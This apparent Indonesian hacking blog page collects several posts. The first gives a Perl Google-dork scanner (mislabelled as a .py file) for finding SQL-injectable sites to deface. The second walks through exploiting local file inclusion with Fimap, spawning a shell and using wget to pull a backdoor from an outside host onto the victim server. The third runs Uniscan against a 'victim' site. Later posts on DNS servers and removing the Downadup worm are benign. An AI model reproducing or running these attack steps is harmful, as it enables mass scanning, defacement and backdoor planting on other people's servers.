Indonesian Blogger

Banner iskaruji dot com

Selasa, 04 Desember 2012

0 Scan SQL Vuln with Python

mungkin temen2 gak mau main tebak2an sama mbah google untuk mencari / membuka satu persatu web yg vuln buat di depes.
so copy script dibawah ini :


Quote:
Code:
#!/usr/bin/perl
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. Script : SQLi Vulnerable Scanner        .:.
# .:. Version : 3.0 fixed (06/10/2012)        .:.
# .:. Author : Metropolis                     .:.
# .:. Home : https://www1.r00tw0rm.com/       .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. MySQL Injection                         .:.
# .:. MSAccess Injection                      .:.
# .:. MSSQL Injection                         .:.
# .:. Oracle Injection                        .:.
# .:. Blind Injection                         .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
#  Useless version :
#  http://pastebin.com/kKxCCJuU 1.0
#  http://pastebin.com/FyPcTLRw 2.0
use LWP::UserAgent;
use Getopt::Std;

getopt('kpo', \%opts);
if($opts{'k'} eq '')
{
print "[Help] SQLi.pl -k shopping.php?id= -p 500\n"; # Max: 50,100,500,700,etc...
}
if($opts{'p'} eq '')
{
    $opts{'p'} = 1;
}

print <<"Metropolis_intro";


    ___________
   |.---------.|
   ||         ||
   || scanner ||   
   ||         ||   
   |'---------'|   
    `)__ ____('     
    [=== -- o ]--.
  __'---------'__ \     
[::::::::::: :::] )
`""'"""""'""""`/T\\
                \\_/

Metropolis_intro
system('COLOR A');
print "\n\n[Script] SQLi Vulnerable Scanner (MySQL,MSAccess,MSSQL,Oracle,Blind)\n";
print "[Author] Metropolis\n\n\n\n";

for($start = 0;$start != $opts{'p'}*10;$start += 10)
{
    $t = "http://www.google.fr/search?hl=fr&q=".$opts{'k'}."&btnG=Search&start=".$start;
    $ua = LWP::UserAgent->new;
    $ua->timeout(10);
    $ua->env_proxy;
    $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E");
    $response = $ua->get($t);
    if ($response->is_success)
    {
        $c = $response->content;
        @stuff = split(/href
=/,$c);
        foreach $line(@stuff)
        {
            if($line =~/(.*) class=l/ig)
            {
                $out = $1;
                $out =~ s/"//g;
      $out =~s/$/\'/;
           
    $ua = LWP::UserAgent->new;
    $ua->timeout(10);
    $ua->env_proxy;
    $response = $ua->get($out);
            $error = $response->content();
            if($error =~m/SQL syntax/)
                {print "$out Vulnerable MySQL!\n";}
               
            elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
                {print "$out Vulnerable MS Access!\n";}
               
            elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
                {print "$out Vulnerable MSSQL!\n";}
           
            elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
                {print "$out Vulnerable Blind Possible!\n";}
               
            elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
                {print "$out Vulnerable Oracle!\n";}
               
            }
        }
        }
        }
kemudian save dengan nama "sql-scan.py"

setelah itu jalankan di terminal kalian
ketik:

Code:
[color=red]@bt:#[/color] ./sql-scan.py -k [dork nya] -p [lalu enter]
nih sreenshot nya

[Image: Screenshot-5.png]


untuk dork silahkan dicari sendiri, sama embah kan ada banyak tu

0 Upload Backdoor or Shell From Local File Inclusion with Fimap

1. Pertama download dulu Fimap nya di   Google Code
2. Setelah di download exract filenya nya. Dan mulailah mencari target LFI.

3. Setelah mendapatkan target nya. Buka terminal kamu (untuk pengguna linux) dan buka cmd kamu (untuk pengguna windows)

4. Masuklah ke direktori folder fimap tadi.

5. Ketikkan command berikut ini :


Pengguna linux :

Code:
./fimap.py -u "[url target]"
 
Pengguna windows :
Code:
fimap.py -u "[url target]"
  
 hide
[Image: 1-1.png]

6. Setelah proses analisa selesai ketikkkan lagi :
Code:
./fimap.py -x

 hide
[Image: Screenshotfrom2012-05-29160211.png]

7. Tunggulah hingga proses selesai. Setelah itu pilih option nomor 1 :
 hide
[Image: Screenshotfrom2012-05-29160226.png]

8. Setelah itu pilih lagi option nomor 1 :

 hide
[Image: Screenshotfrom2012-05-29160244.png]

9. Setelah proses selesai pilih lagi option nomor 1. Spawn Fimap shell :



10. Dan sekarang lihatlah. Taraaaa. Sekarang kita udah di halaman utama user du public_html :). Ketikkan command berikut ini untuk mengambil script shell atau backdoor kemudian menyimpannya di server tersebut dengan nama homo.php
Code:
wget http://www.heng-sieng.fr/bug.txt -O homo.php
 hide
[Image: Screenshotfrom2012-05-29160422.png]


11. Terakhir. Sekarang liatlah apakah shell kita berhasil di upload atau tidak ? Ternyata ? Yeah berhasil. Good job :)
 hide
[Image: Screenshotfrom2012-05-29160444.png]














0 Uniscan Vulnerability Scanner

Uniscan adalah scanner kerentanan untuk aplikasi web, yang ditulis dalam 'perl' untuk lingkungan Linux. Ini dikembangkan sebagai pekerjaan kesimpulan dari program ilmu komputer dari Universitas Federal Pampa dan berlisensi di bawah GNU GENERAL PUBLIC LICENSE 3.0 (GPL 3).
So, jadi intinya uniscan berfungsi untuk mencari informasi tentang apakah sebuat situs mempunyai celah seperti xss,sqli,rfi/lfi dan uniscan juga berguna untuk mencari folder-folder atau directory dari sebuah situs.

sebelumnya ini saya paparkan bagi pengguna linux

Fitures of uniscan

Quote:-Identifikasi halaman sistem melalui Web Crawler.
-Penggunaan benang di crawler.
-Mengontrol jumlah maksimum permintaan crawler.
-Pengendalian variasi halaman sistem diidentifikasi oleh Web Crawler.
-Pengendalian ekstensi file yang diabaikan.
-Uji halaman yang ditemukan melalui metode GET.
-Uji bentuk ditemukan melalui metode POST.
-Dukungan untuk permintaan SSL (HTTPS).
-Proxy dukungan.
-Menghasilkan daftar situs menggunakan Google.
-Menghasilkan daftar situs menggunakan Bing.
-Plug-in mendukung untuk Crawler.
-Plug-in mendukung untuk tes dinamis.
-Plug-in mendukung untuk tes statis.
-Plug-in mendukung untuk tes stres.
-Dukungan multi-bahasa.
-Web client.
-Klien GUI ditulis dalam perl menggunakan tk.


bagi yg belum ada untuk instalasi
ketik perintah berikut :

:~$apt-get install uniscan

bagi pengguna BT bisa di dapat di : cd /pentest/web/uniscan

selanjudnya saya akan coba mempraktek-kan nya dgn salah satu situs http://www.X.com (maaf nama di sensor)

oke, untuk menjalankannya ketik perintah berikut

root@bt:/pentest/web/uniscan# ./uniscan.pl -u http://www.X.com -qweds

penjelasan :

q:directory
w:file
e:file robot.txt
d:dinamic /mencari celah atau bug yg ada pada site tersebut
s:static

[Image: Screenshot-1-2.png]

oke, berikut Screenshot dari hasil uniscan yg saya coba:

[Image: Screenshot-2-1.png]
#nah keliatan kan Server sama IP korban.
#Directory Check ==> directory yg di temukan oleh uniscan , oke NEXT


[Image: Screenshot-3-1.png]
#File Check ==> disini saya hanya menemukan satu file dalam situs korban
#Tidak ditemukannya Robots.txt dan Sitemap.xml
#Crawl Started ==> adalah pencarian situs target yang akan diuji.

selanjutnya :

[Image: Screenshot-4-1.png]

#disini saya tidak menemukan Web Backdoors, Timthumb dan File Upload Forms
#ada beberapa external host yg kita temukan
#dan lagi-lagi saya tidak menemukan FCKeditor File Upload.

oke, selanjutnya:

[Image: Screenshot-5-1.png]
#tuh keliatan E-mails yg ada pada site korban
#disini juga saya tidak menemukan adanya Source Code Disclosure, PHPinfo () Disclosure, Ignored Files
#Dinamic Test , oke. sama halnya seperti Crawl Started,
Next


[Image: Screenshot-6-1.png]
#NULL FCKeditor Test tidak berisi apa-apa.


[Image: Screenshot-7-1.png]
#NOTHINK FOR FILES, hmmm not good

oke, lanjut


[Image: Screenshot8.png]
[Image: Screenshot9.png]
#tidak di temukan nya Remote Command Execution and Remote File Include.
#Uniscan sedang melalukan proses SQLinjection
oke, selanjutnya


[Image: Screenshot-10.png]
#NOTINK FILES Cross-Site Scripting (XSS) dan Web Shell Finder
#Local File Include dan Remote Command Execution, NOTHINK

oke, selanjutnya


[Image: 11-3.png]

#oke Job FINISH


hmmm, not good.

oke, Sedikit Pengertian mengenai Penjelasan diatas


Quote:#Directory checking
memeriksa direktori membantu untuk menemukan direktori tersembunyi, dengan kata lain, isi direktori yang tidak ditemukan oleh crawler tidak diuji.

#File checking
Pemeriksaan berkas mengikuti prinsip yang sama untuk memeriksa direktori.

#Checking robots.txt file
Memeriksa file robots.txt berfungsi untuk memberi makan crawler dengan direktori dan file yang tidak dapat ditemukan oleh crawler. Pemeriksaan ini mengabaikan Izinkan dan pola Larang dari file jenis ini, setiap direktori dan file ditemukan di sini akan ditambahkan ke crawler.

#Checking sitemap.xml file
Pengecekan file sitemap.xml mengikuti prinsip-prinsip yang sama untuk memeriksa file robots.txt.

#Crawler
Fungsi dari crawler adalah untuk menavigasi ke halaman pencarian situs target yang akan diuji kemudian oleh tes mesin dan mengumpulkan informasi sensitif.

Plug-ins

#check Upload Form.pm
mengidentifikasi bentuk file upload, file yang sering diupload dan tidak divalidasi, oleh krn itu dapat menyebabkan risiko serius ke server yang host situs target.

#code Disclosure.pm
pencarian untuk potongan kode bahasa pemrograman dalam HTML dikirim oleh aplikasi web. Sebuah kode meninggalkan sebagai komentar HTML berpotensi membahayakan keamanan aplikasi Web, karena dalam potongan kode kecil, Anda dapat mengidentifikasi variabel dan nilai-nilai yang relevan dengan sistem Anda, seperti nama pengguna dan password untuk database.

#E-mail Colect.pm
memiliki fungsi mengumpulkan e-mail yang dikirim dalam HTML oleh aplikasi target. Seringkali e-mail alias sesuai dengan username yang digunakan di layanan lain, seperti SSH. Sehingga membuatnya lebih sederhana satu bruteforce layanan ini.

#External Host.pm
mengidentifikasi link ke situs lain. Dengan plug-in ini kita dapat menemukan aplikasi atau link ke organisasi lain.

#FCKeditor.pm
mencoba untuk meng-upload sebuah file txt ke situs target ketika bertemu dengan direktori yang berisi skrip FCKeditor. Kerentanan meng-upload file sewenang-wenang sangat berbahaya bagi server hosting aplikasi web.

#phpinfo.pm
mengidentifikasi halaman yang menggunakan phpinfo PHP function (). Fungsi ini menunjukkan informasi lingkungan yang sensitif terhadap penyerang. Informasi tersebut tidak boleh diakses oleh siapa pun kecuali tim pengembangan aplikasi web.

#Timthumb.pm
mengidentifikasi file rentan terhadap kerentanan Timthumb dengan versi lebih rendah dari versi 1,33. Dari kerentanan ini memungkinkan untuk meng-upload file untuk mengeksekusi perintah pada server target.

#webShellDisclosure.pm
upaya untuk mengidentifikasi Webshells mungkin tersembunyi di direktori dari aplikasi Web dalam analisis, dianjurkan untuk menggunakan plug-in ketika diidentifikasi file formulir pemuatan tanpa otentikasi atau ketika host target telah dikompromikan di beberapa cara.

pengertian dari penjelasan ini saya dapat dari sumber http://uniscan.sourceforge.net/


mungkin itu aja yg bisa saya sampaikan mengenai fungsi dari uniscan, so maaf kalo banyak kesalahan.

thank's

Rabu, 08 Februari 2012

0 Mempercepat koneksi internet dengan DNS

Mungkin bagi anda ini sepel tapi bagi saya ini berpengaruh juga terhadap koneksi internet. Mungkin belom ada yang tahu DNS itu apa....?



DNS kepanjangan Domain Name Server. Fungsi DNS menerjemahkan namaDomain menjadi deretan angka IP. Contohnya bila kita akan membuka atau merequest url Domain tertentu, biasanya kita menggunakan deretan nama atau huruf karena lebih mudah dihafal seperti esc-creation.com, google.com, yahoo.com , Facebook.com dan sebagainya.
Nah disinilah DNS ini bekerja. DNS ini melakukan encode atau menerjemahkan dari domain google.com ke dalam bentuk deretan angka unik yaitu berupa IP misal google.com Ip nya adalah 208.67.219.231. Jadi bila kita masukan 208.67.219.231 pada browser maka juga akan membuka domain google.com tersebut. Deretan angka IP seperti 174.36.138.32. IP inilah yang digunakan mesin internet untuk saling berkomunikasi seperti Server DomainServer Hosting, Server Proxy dan sebagainya.
Terus apa hubungan DNS dengan kecepatan akses internet kita ?
Selain trik dan tips mempercepat akses internet pada postingan laluMenggunakan Proxy dan tweaking pada borwser. Kita juga bisa menggunakan DNS alternatif ini untuk mempercepat akses internet kita.
Pada dasarnya semua ISP (Internet Service Provider) atau penyedia layanan sambungan internet seperti indosat, Telkomsel, Telkom, dan sebagainya menggunakan atau mempunyai DNS Server tersendiri.Server DNS suatu ISP atau penyedia internet tentunya juga mempunyai kemampuan, kecepatan, speseifikasi, dan lama cache tersediri.
Adakalanya Server DNS ini Drop karena padatnya Trafik DNS server suatu ISP. Sehingga menyebabkan lambannya query atau proses request. Jadi bila terjadi gangguan pada Server DNS suatu ISP, maka pada saat kita akan membuka website menggunakan browser seperti mozila , Firefox, Opera, Flock, safari dan sebagainya, maka akan terasa lebih lambat bahkan terjadi konfirmasi error atau not Found pada browser kita. Seperti yang dulu sering terjadi di Telkom Speedy beberapa saat lalu.
Meski ISP atau penyedia Internet yang kita gunakan mempunyai Server DNS sendiri sebenarnya kita juga bisa menggunakan atau memanfaatkan DNS server ISP operator lain. Jadi Server DNS ini bisa kita gunakan untuk semua jenis ISP yang kita gunakan.

Cara merubah Setting DNS pada windows :
Control panel >>> Network Connections >>> Klik kanan account sambungan internet yang sedang aktif /connected >>> Properties >>> Networking >>>Internet Protocol >>> Properties >> Beri Tanda pada Use the Following DNS server addresses >>> masukan DNS yang anda pilih >> Klik Ok
Berikut DNS server yang saya ketahui :
Server DNS indosat.net.id termasuk DNS Indosat IM2
  • 202.155.0.10
  • 202.155.0.15
  • 202.155.0.20
  • 202.155.0.25
  • 202.155.46.66
  • 202.155.46.77
  • 202.155.30.227
DNS Telkom.net.id dan DNS Telkom Speedy
  • 202.134.0.155 : CacheDNS-JKT1.telkom.net.id (Jakarta)
  • 203.130.196.5 : CacheDNS-JKT2.telkom.net.id (Jakarta)
  • 203.130.196.155 : CacheDNS-JKT3.telkom.net.id (Jakarta)
  • 202.134.0.61 : CacheDNS-JKT4.telkom.net.id (Jakarta)
  • 125.160.2.226 : cachedns-tmk.telkom.net.id (Jakarta)
  • 202.134.1.10 : CacheDNS-SBY1.telkom.net.id (Surabaya)
  • 125.160.4.82 : CacheDNS-SBY2.telkom.net.id (Surabaya)
  • 61.94.192.12 : nsdpr1.telkom.net.id (Denpasar)
  • 125.160.2.34 : CacheDNS-DPS.telkom.net.id (Denpasar)
  • 125.160.2.162 : CacheDNS-MKS.telkom.net.id (Makasar)
  • 203.130.193.74 : CacheDNS-BTM.telkom.net.id (Batam)
  • 203.130.206.250 : CacheDNS-MDN.telkom.net.id (Medan)
  • 203.130.208.18 : CacheDNS-SMG.telkom.net.id (Semarang)
  • 203.130.209.242 : CacheDNS-BPP.telkom.net.id (Balik Papan)
  • 222.124.204.34 : CacheDNS-BDG.telkom.net.id (Bandung)
  • 202.134.0.62 : dns1.telkom.net.id
  • 222.124.18.62 : dns2.telkom.net.id
  • 203.130.196.6 : ns1.telkom.net.id
  • 203.130.193.75 : ns2.telkom.net.id
  • 202.134.1.5 : ns3.telkom.net.id
  • 202.134.1.7 : Telkom (Jakarta)
  • 125.160.14.189 : Telkom (Jakarta)
DNS Dirjen PostTel Indonesia 
  • 203.34.118.10
  • 203.34.118.12
DNS Nawala Awari dns
  • 180.131.144.144
  • 180.131.145.145
DNS PT Dwi Tunggal Putra Network Access Point
  • 202.43.160.50
  • 202.43.160.51
DNS PT Digital Wireless Indonesia ISP
  • 122.200.48.14
  • 122.200.48.15
DNS POWER TELECOM Jakarta
  • 203.190.55.210
  • 203.190.55.211
DNS sat.net.id
  • 202.149.82.25
  • 202.149.82.29
DNS XL Excelmindo
  • 202.152.254.245
  • 202.152.254.246
DNS cbn.net.id
  • 202.158.40.1
  • 202.158.20.1
  • 202.158.3.7
  • 202.158.3.6
DNS Idola .net
  • 202.152.5.36
  • 202.152.0.2
Singnet Singapore
  • 165.21.100.88
  • 165.21.83.88
DNS indo.net.id
  • 202.159.32.2
  • 202.159.33.2
DNS itb.ac.id
  • 202.249.24.65
  • 167.205.23.1
  • 167.205.22.123
  • 167.205.30.114
DNS ukdw.ac.id
  • 222.124.22.18
Daftar Public DNS Luar indonesia (International ):
DNS Open DNS
  • 208.67.222.222
  • 208.67.220.220
DNS Google
  • 8.8.8.8
  • 8.8.4.4
DNS ScrubIt
  • 67.138.54.100
  • 207.225.209.66
DNS DNSadvantage
  • 156.154.70.1
  • 156.154.71.1
DNS vnsc-pri.sys.gtei.net
  • 4.2.2.1
  • 4.2.2.2
  • 4.2.2.3
  • 4.2.2.4
  • 4.2.2.5
  • 4.2.2.6
Verizon (Reston, VA, US)
  • 151.197.0.38
  • 151.197.0.39
  • 151.202.0.84
  • 151.202.0.85
  • 151.202.0.85
  • 151.203.0.84
  • 151.203.0.85
  • 199.45.32.37
  • 199.45.32.38
  • 199.45.32.40
  • 199.45.32.43
GTE (Irving, TX, US)
  • 192.76.85.133
  • 206.124.64.1
One Connect IP (Albuquerque, NM, US)
  • 67.138.54.100
OpenDNS (San Francisco, CA, US)
  • 208.67.222.222
  • 208.67.220.220
Exetel (Sydney, AU)
  • 220.233.167.31
VRx Network Services (New York, NY, US)
  • 199.166.31.3
SpeakEasy (Seattle, WA, US)
  • 66.93.87.2
  • 216.231.41.2
  • 216.254.95.2
  • 64.81.45.2
  • 64.81.111.2
  • 64.81.127.2
  • 64.81.79.2
  • 64.81.159.2
  • 66.92.64.2
  • 66.92.224.2
  • 66.92.159.2
  • 64.81.79.2
  • 64.81.159.2
  • 64.81.127.2
  • 64.81.45.2
  • 216.27.175.2
  • 66.92.159.266.93.87.2
Sprintlink (Overland Park, KS, US)
  • 199.2.252.10
  • 204.97.212.10
  • 204.117.214.10
Cisco (San Jose, CA, US)
  • 64.102.255.44
  • 128.107.241.185

Catatan :
Beberapa DNS tidak bisa digunakan untuk akses FTP dan Website tertentu diblokir oleh Server DNS tersebut..
DNS Nawala Awari dan DNS Dirjen Postel bisa digunakan untuk memblokir situs pornografi

Senin, 06 Februari 2012

0 Cara Mengatasi pesan "Generic Host Process for Win32 Services" (Virus)

Generic Host Process for Win32 Services

Aduuuh sahabat CHC Saya paling sebal jika saya sedang Browsing kemudian Muncul Pesan seperti itu, Hampir 5 Hari saya mengalami masalah itu dan tidak kelar-kelar juga. Akhirnya ku Cari masalah Notice tersebut dengan menggunakan browser safari di Iphone saya, dan akhirnya ku temukan akibat permasalahan tersebut. Ternyata masalah itu disebabkan Oleh Virus yang dapat menDisable Document sharing/Printer Sharing dan Network Connection sehingga Koneksi internet kita terputus dan harus Restart kembali jika ingin Konek lagi. Saya mengalaminya sama seperti itu, Baru 10 Menit PC saya di Nyalain eeeh ada Pesan “Generic Host Process for Win32 Services”
Seperti gambar dibawah ini ;


Dan saya restart, saya konekin lagi dan berhasil tapi selang waktu 10 Menitan, ga konek lagi dan muncul pesan error seperti itu.


Saya Posting artikel ini hanya untuk membantu teman-teman yang mengalami masalah seperti ini dan bagi yang belum, hati-hati ya J
 
 
Ok to the Point saja, berikut cara mengatasinya
1. Download dulu FixDownadup.exeDi Sini 
2. lalu Download juga patch dari microsoft WindowsXP-KB958644-x86-ENU.exe, bisa download  NANG KENE
3. Setelah keduanya beres di download, menurut sumber yang kudapat kita musti restart komputer dan masuk ke Safe Mode. (restart komputer lalu tekan F8 dan pilih opsi safe mode)
4. Setelah masuk ke safe mode, loginlah sebagai administrator. Kemudian jalankan FixDownadup.exe atau antivirus bikinan symantec tersebut. Tekan start agar antivirus mulai melakukan tugasnya untuk scanning virus. Tunggu sampai proses scanning selesai. Biasanya akan ada laporan berupa file notepad yang berisi info bahwa komputer kamu sekarang telah bebas virus (kurang lebih seperti itu).
5. Restart PC dan masuk ke windows biasa (bukan safe mode) dan installah patch dari microsoft WindowsXP-KB958644-x86-ENU.exe.
6. Restart Pc dan proses pembersihan telah selesai. Aku kemarin waktu melakukan proses scanning untuk menghilangkan atau membersihkan Virus Generic Host Process for Win32 Services, kulakukan bukan dalam posisi safe mode karena masih bingung. Jadi, langsung kuinstall saja dan setelah proses scan virus selesai langsung kuinstall untuk patch dari microsoft WindowsXP-KB958644-x86-ENU.exe.Terakhir, kurestart PC, alhasil sampai sekarang PC ku sudah bisa konek ke internet dengan lancar. Jika suatu ketika muncul lagi virus generic host-nya, tinggal kuscan dengan FixDownadup.exe, maka komputer akan bersih kembali. Praktis, tapi aku tidak menganjurkan pembaca untuk meniru langkah yang kutempuh, yaitu melakukan proses scanning bukan dalam posisi safe mode. Karena takutnya akan ada efek tertentu yang akan ditimbulkan, meskipun sampai sekarang komputerku masih lancar-lancar saja. Dan aku bisa online facebook seharian :D dan pastinya nge-BLOG untuk berbagi ilmu kepada agan-agan J

Uppsss Sahabat CHC sbenarnya masih ada cara lain, Yukkz Kita intip J
1. Cara pertama.
Klik start lalu run dan ketikkan regedit. Kemudian cari folder berikut HKEY_LOCAL_MACHINE > SYSTEM > CurrentControlSet > Services > Browser >Parameters. Temukan Name: IsDomainMaster dan set nilainya jadi false. Restart komputer.
2. Atau bisa pakai cara kedua berikut ini.
Klik start lalu run dan ketikkan CMD. Kemudian ketik netsh dan tekan enter. Setelah itu ketik winsock tekan enter dan tekan reset. Langkah terakhir restart PC kamu.
3. Cara ketiga dengan cara menutup port 445
Klik start lalu run dan ketik regedit. Cari folder berikut HKEY_LOCAL_MACHINESystemCurrentControlSetServicesNet BTParameters. Dan temukan TransportBindName yang semula berisi device rubah dengan mengosongkannya (menghapus device).
4. Tutup port 135
Masuk ke run dan ketik regedit, lalu cari HKEY_LOCAL_MACHINESoftwareMicrosoftOLEregistry dan temukan EnableDCOM. Rubah valuenya dari Y menjadi N.
5. Restart Komputer anda, dan tunggu sampai kiamat, apakah Pesan “Generic Host Process for Win32 Services” masih Nongol, kalo masih Nongol Pentung saja…wkwkwk
Itu dulu dah Ilmu cetek yang bias saya sampaikan. Terimakasih ya sudah berkunjung di blog CHC
Semoga bermanfaat dan jangan Lupa Follow Blog kami dan Komentarnya donk, Juga Like FPnya ya..hehe
Sekian & Selamat Mencoba
 
-::DESCRIPTION
-::DATE
Diberdayakan oleh Blogger.